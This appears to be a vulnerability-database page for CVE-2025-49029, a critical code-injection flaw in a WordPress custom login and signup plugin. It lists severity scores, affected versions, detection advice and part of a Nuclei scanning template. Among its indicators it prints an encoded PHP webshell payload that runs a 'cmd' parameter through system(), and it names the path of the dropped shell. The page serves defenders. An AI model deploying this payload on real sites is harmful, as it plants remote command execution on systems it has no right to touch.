CVE-2025-49029
published 2025-07-01CVE-2025-49029: Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget custom-login-and-signup-widget allows Code…
PriorityP260critical9.1CVSS 3.1
AVNACLPRHUINSCCHIHAH
EXPLOIT
EPSS
2.12%
79.6th percentile
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget custom-login-and-signup-widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through <= 1.0.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bitto.kazi | custom_login_and_signup_widget | <= 1.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandtext=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit↗
- →Detect exploitation attempts by monitoring POST requests to the plugin settings page with PHP webshell payloads in the `text` parameter ↗
- →Monitor for GET requests to the dropped webshell at /wp-content/plugins/custom-login-and-signup-widget/content/sn.php, especially with a `cmd` query parameter ↗
- →A successful exploitation results in HTTP 500 from the dropped sn.php file; correlate with prior POST to the settings page containing PHP code in the `text` field ↗
- →Use publicwww/FOFA fingerprint to identify exposed vulnerable instances ↗
- →The attack requires authentication as an administrator; look for admin login followed immediately by POST to the plugin settings page with PHP code in the body ↗
- ·Exploitation requires administrator-level authentication; unauthenticated exploitation is not possible with this CVE ↗
- ·Affected versions are Custom Login And Signup Widget from n/a through 1.0 only ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
nuclei
CVE-2025-49029 WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
Template:
id: CVE-2025-49029
info:
name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
author: pussycat0x
severity: high
description: |
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
impact: |
Authenticated administrators can inject arbitrary PHP code through the plugin settings, potentially achieving
No writeups or analysis indexed.
2025-07-01
Published